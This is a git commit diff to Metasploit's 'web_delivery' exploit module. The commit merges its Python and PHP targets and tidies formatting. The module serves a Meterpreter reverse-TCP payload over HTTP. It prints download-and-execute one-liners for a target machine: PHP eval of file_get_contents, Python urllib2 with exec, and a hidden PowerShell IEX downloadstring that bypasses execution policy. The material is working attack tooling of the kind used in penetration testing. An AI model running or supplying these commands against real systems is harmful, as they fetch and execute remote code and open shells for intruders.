Updates

Updated spacing, ranking, php command, platform, and merged *nix and windows cmds
2014-06-25 16:34:51 -04:00 · 2014-06-25 16:34:51 -04:00 · 54ccc261d1
parent 3abfa3e12e
commit 54ccc261d1
1 changed files with 18 additions and 31 deletions
--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@ -6,7 +6,7 @@
 require 'msf/core'

 class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpServer

@ -30,9 +30,9 @@ class Metasploit3 < Msf::Exploit::Remote
          'Chris Campbell' #@obscuresec - Inspiration n.b. no relation!
        ],
      'DefaultOptions' =>
-                                {
-                                    'Payload' => 'python/meterpreter/reverse_tcp'
-                                },
+        {
+          'Payload' => 'python/meterpreter/reverse_tcp'
+        },
      'References'	 =>
        [
          [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
@ -40,22 +40,14 @@ class Metasploit3 < Msf::Exploit::Remote
          [ 'URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
          [ 'URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
        ],
-      'Platform'       => %w{ py php win},
+      'Platform'       => %w{ python php win},
      'Targets'        =>
        [
-          ['Python_win', {
+          ['Python', {
            'Platform' => 'py',
            'Arch' => ARCH_PYTHON
          }],
-          ['Python_linux', {
-            'Platform' => 'py',
-            'Arch' => ARCH_PYTHON
-          }],
-          ['PHP_win', {
-            'Platform' => 'php',
-            'Arch' => ARCH_PHP
-          }],
-          ['PHP_linux', {
+          ['PHP', {
            'Platform' => 'php',
            'Arch' => ARCH_PHP
          }],
@ -69,16 +61,16 @@ class Metasploit3 < Msf::Exploit::Remote
          }],
        ],
      'DefaultTarget'  => 0,
-      'DisclosureDate' => 'N/A'
+      'DisclosureDate' => 'Jul 19 2013'
       ))
      end

  def on_request_uri(cli, request)
    print_status("Delivering Payload")
    if (target.name.include? "PSH")
-        data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
+      data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
    else
-        data = %Q|#{payload.encoded} |
+      data = %Q|#{payload.encoded} |
    end
    send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
  end
@ -87,18 +79,13 @@ class Metasploit3 < Msf::Exploit::Remote
    url = get_uri()
    print_status("Run the following command on the target machine:")
    case target.name 
-    when "PHP_linux"
-        print_line("php -r \"eval(file_get_contents('#{url}'));\"")
-    when "PHP_win"    
-        print_line("php.exe -r \"eval(file_get_contents('#{url}'));\"")
-    when "Python_linux"
-        print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
-    when "Python_win"    
-        print_line("python.exe -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
-    when "PSH"
-        download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
-        print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"")
+    when "PHP"
+      print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"")
+    when "Python"
+      print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
+    when "PSH_x86", "PSH_x64"
+      download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
+      print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"")
    end
  end
- end
-
+ end